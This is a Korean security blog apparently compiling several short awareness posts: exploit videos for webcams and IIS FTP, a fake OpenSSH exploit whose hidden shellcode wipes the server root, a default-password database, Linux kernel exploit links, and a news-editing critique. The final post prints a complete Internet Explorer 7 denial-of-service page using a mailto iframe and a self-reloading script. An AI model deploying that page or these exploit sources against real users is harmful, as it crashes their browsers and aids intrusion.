항간에 한참 이야기 했던 웸캠에 대한
익스플로잇이 동영상을 시연하는게
올라 왔네요..
모두들 조심하셔야 겠습니다.


Posted by 엔시스

지난번 제로데이 공격에 대한 2009/09/01 - [Security Skill&Trend] - II5&6 FTP 제로데이공격 익스플로잇 공개 라는 포스팅을 한 적이 있다.

요즘은 워낙 파급 속도가 빨라서 공격과 패치가 거의 동시에 이루어져야 하는데 아무래도 제로데이 공격이 우위인듯하다.

늘 창과 방패의 역할이 되는 것이다.

그런데 IIS 5&6 을 공격하는 동영상이 인터넷에서 검색이 되었다. 윈도우 시스템을 관리하는 사람은 한번쯤 점검을 해 보는게 좋겠다.

http://www.offensive-security.com/videos/microsoft-ftp-server-remote-exploit/msftp.html


해당 익스플로잇은 링크하거나 소개 하지 않겠다.  그리고 보안에 대하여 아직 마인드가 잘 갖추어지지 않은 분들은 함부로 남의 서버를 건들면 법에 저촉을 받게 되니 절대 부정한 의도로 사용하지 말기를 바란다. 꼭 연구 공부 테스트용으로만 사용하고 그외에 대한부분은 본 블로거는 책임을 지지 않는다.


Posted by 엔시스



조금 시간이 지난 이야기입니다. 이 포스팅은 한참 Open SSH 에 대한 말들이 많을때 포스팅 해 놓았으나 비공개로 되어 있었던 부분인데 굳이 비공개로 해 놓을 이유가 없어 발행합니다. 참고 하시면 되겠습니다.

리눅스를 사용하시는 분이라면 Open SSH를 잘 알고 있을 것입니다. 보통 윈도우 경우 원격 서버 관리 툴로 윈도우 터미널을 사용하는 반면에 리눅스의 경우 텔넷이나 SSH를 사용하게 됩니다.

그런데 텔넷은 원격 서버와 통신시에 암호화가 되지 않은 이유로 보통 SSH를 많이 사용하고 있습니다. 즉 오고가는 패킷을 암호하여 전달하고 있다는 이야기입니다. 따라서 외부로의 안전을 보장 받아서 유명한 서비스 기능이기도 하는데 이 패키지에 취약점이 발견 되었다는 것입니다.

그런데 이러한 취약점을 공격하는 익스플로잇 (일명: 공격도구툴) 이 인터넷을 통하여 나돌고 있는데 그것이 가짜라고 하는 것입니다.


일부 쉘코드가 있고 스크립트가 있습니다. 그런데 저 안에 쉘코드를 인코딩한 것을 디코딩하고 텍스트로 바꾸어 보면

http://cloud.ttongfly.net/ssh_rm_command.jpg

보인다고 하니 조심을 해야겠습니다. 그의미는 바로 서버 루트를 날려 버리는 것입니다..이것은 우선 자신의 리눅스 서버에서 오픈 SSH가 취약점이 있는지 없는지를 테스트 해 보기 위해서 할 수 있는 방법인데 잘못 하다간 큰일이 나겠습니다.

따라서 리눅스 서버 관리자들은 조심하여 시스템을 관리 하셔야 겠습니다. 잘못 실행하면 서버 디렉토리나 파일이 삭제 된다는 이야기입니다.

스크립트키드 함부로 사용하지 말것

일명 스크립트 키드라고 불리는 보안에 관심은 있지만 일정한 수준에 오르지 못하고 스스로 프로그램을 만들지 못하며 남이 만든 프로그램으로 악용하는 사람들을 일컫어 부르는 말입니다.. 이런 사람들에게는 이번 오픈 SSH 익스플로잇에 대하여 진짜다 가짜다 설왕설래 의견이 분분하지만 조심 해야 한다는 경고의 메세지를 보냅니다.

아무래도 익스플로잇에 대한 이해가 없이 그냥 막연히 실행만 하였을 경우 위에서 보듯이 가짜 일 경우 바로 서버에 파일이 삭제가 되는 현상이 발생합니다. 보안 커뮤니티에서는 이 같이 가상의 머신에서 익스플로잇을 테스트 하다가 파일을 날려 먹었다는 이야기도 오고가고 있으니. 상당한  주의를 요하게 됩니다. 설령 서비스중인 서버에서 위와 같은 무모한 행동은 하지 않기를 바랍니다. 그것은 평소 테스트용 에서 하는 습관을 가지는게 좋습니다. @엔시스.

Posted by 엔시스

1. 개요
여러가지 밴드들이 생산해 내는 제품이나 운영체제 등에는 반드시 기본 패스워드가 있습니다. 그런 패스워드가 어떤 것들이 있는지가 웹싸이트에 공개되어 패스워드 관리를 하지 않은 사람들에게 표적이 될수 있습니다..그것을 알아보고 피해를 당하는 일이 없어야 하겠습니다.

2. 디볼트패스워드

www.redoracle.com 싸이트에 보면 Default Password Database가 공개되어 있습니다. 425밴더에 2100여개 기본 패스워드가 어떤게 있는지를 보여 주고 있습니다...기본패스워드라는 것은 제품 적용했을때 제일 처음 적용되어 있는 패스워드를 말합니다.  그건 기본패스워드를 변경할줄 몰라서 그런다기 보다는 관리자들의 귀찮이즘이나 패스워드 관리를 하지 않기 때문일수도 있습니다..대부분 디볼트 패스워드를 사용한는 곳은 잘 없지만 일부에선 그대로 사용할수도 있기 때문에 참고 하시면 되겠습니다.

사용자 삽입 이미지

                   < 레드오라클 사이트의 메인 페이지 화면>

3. 익스플로잇
자세히 보면 익스플로잇도 공개를 하고 있습니다. 여기서 익스플로잇(Exploits)이라고 함은 로컬이나 리모트를 공격할때 취약점을 쉽게 공격할수 있도록 도와주는 도구 정도로 보시면 되겠습니다...그런 툴을 공개하는 것입니다..

사용자 삽입 이미지

맺음말

이제는 외국의 어떤 곳에서도 인터넷만 되면 자료를 찾을수 있는 세상에 살고 있습니다..비밀이란 없는 세상에 사는 듯합니다..따라서 시스템 관리에 있어 가장 기본이 되는 패스워드 관리를 소홀히 해서는 안되겠습니다..기본값 패스워드는 물론이고 어떤 곳에서든지 사전공격(디션어리 어텍)에 쓰이는 파일을 찾는 것은 아주 쉬운 일이 되어 버렸습니다...자신의 pc에 사용하는 패스워드 관리도 잘 해야겠습니다..

전주현
sis@sis.pe.kr
Posted by 엔시스

리눅스 커널 2.6 에서 버그 발견 익스플로잇이 공개 되었습니다.
각별한 조심 하세요...


http://www.milw0rm.com/exploits/5093
http://www.milw0rm.com/exploits/5092

대처방법

 http://wowhacker.com/BoArD/view.php?id=wow_free&page=1&sn1=&divpage=2&sn=off&ss=on&sc=on&select_
arrange=headnum&desc=asc&no=8014


Posted by 엔시스

무선랜에 대한 최근  보안 취약성과 익스플로잇이 올라 오는 싸이트 입니다.. 이제는 유선에서 무선으로 많이들 대체가 되고 있는 상황이라 도움이 되겠습니다...


사용자 삽입 이미지

관련 싸이트
http://www.wirelessve.org/  



Posted by 엔시스

어제  KBS 뉴스를 보았는데 아쉬운 점이 있다.  제목이 자극적이었나.
낚시성 포스팅은 아니니 염려하지 마시길..

http://news.kbs.co.kr/article/news9/200608/20060822/1208126.html

첫 화면을 보면 우연의 일치인지 모르겠지만 , 조금만 정보보호, 보안에 관심 있는 사람이라면 알수 있는 아주 강력한 툴이 화면 전면에 버젓이 나와 있습니다.  편집과정에서 제목하고 버전정도는 모자이크 처리 했어어야 한다.

왜냐하면 뉴스의 특성상 상당히 자극적인 내용이었다.  해커가 50만명의 고객 정보를 유출하여 돈을 요구 했다고 하면 ,..청소년이나 윤리의식이 없는 일부 사람들은 어떻게 해킹했길래 그렇게 할수 있을까 하는 호기심을 유발시키기에 충분한 뉴스였기 때문이다.

그런데 거기에 전문적인 용어로 SQL injection 자동화 해킹툴이 버젓이 동영상 전면에 캡쳐되어 있으니..뭐 이거 보고 찾아서 하라는 내용도 아닐테고  조금은 편집상 주의를 했어야 하는 기사였다.

항상 해킹에 관한 뉴스나 기사가 나올때면 주의해야 하는 부분중에 하나이기도 하다.

이렇게 이제는 컴퓨터를 조금만 할 줄알면 구할수 있는 해킹툴로 소중한 정보가 노출되기
때문에 보안관리자, 시스템 관리자는 더욱 각별히 신경을 써야만 할것이다.

한가지 더 염려스러운 것은 나 또한 이렇게 포스팅 하는게  오히려 역효과가 나지 않았으면
하는 바램이 간절하다.  행동은 각자가 알아서 하면 될것이다.

<엔시스>

Posted by 엔시스

인터넷익스플로러 7.0 도스공격 익스플로잇

<HTML>
<BODY>
<!-- Internet Explorer 7 ( Remote DoS !!! ) -->
<!-- By: JAAScois  -->
<!-- More info:
http://www.jaascois.com/exploits/  -->
<iframe  src="mailto://admin@jaascois.com"></iframe>
<script>window.location='ie7_DoS.html';</script>
</BODY>
</HTML>


벌써 IE7.0 도스공격 익스플로잇이 발표 되었습니다..
조심 하셔야겠습니다..

<출처: 정보보호전문가 카페 http://cafe.naver.com/nsis.cafe>

Posted by 엔시스